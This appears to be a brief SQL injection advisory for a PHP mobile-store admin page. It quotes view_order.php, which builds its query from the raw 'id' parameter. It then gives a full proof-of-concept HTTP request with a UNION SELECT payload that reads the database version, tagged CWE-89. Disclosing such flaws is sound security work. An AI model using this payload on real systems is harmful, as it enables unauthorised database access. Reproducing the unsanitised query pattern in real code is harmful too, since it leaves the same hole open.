/admin/orders/view_order.php
<?php
if(!isset($_GET['id'])){
$_settings->set_flashdata('error','No order ID Provided.');
redirect('admin/?page=orders');
}
$order = $conn->query("SELECT o.*,concat(c.firstname,' ',c.lastname) as client FROM `orders` o inner join clients c on c.id = o.client_id where o.id = '{$_GET['id']}' ");
if($order->num_rows > 0){
foreach($order->fetch_assoc() as $k => $v){
$$k = $v;
}
}else{
$_settings->set_flashdata('error','Order ID provided is Unknown');
redirect('admin/?page=orders');
}
?>HTTP Request Example
GET /mobile_store/admin/?page=orders/view_order&id=1'+AND+FALSE+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,version()--+- HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://localhost/mobile_store/admin/?page=orders
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: lang=en_US;
Connection: close
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')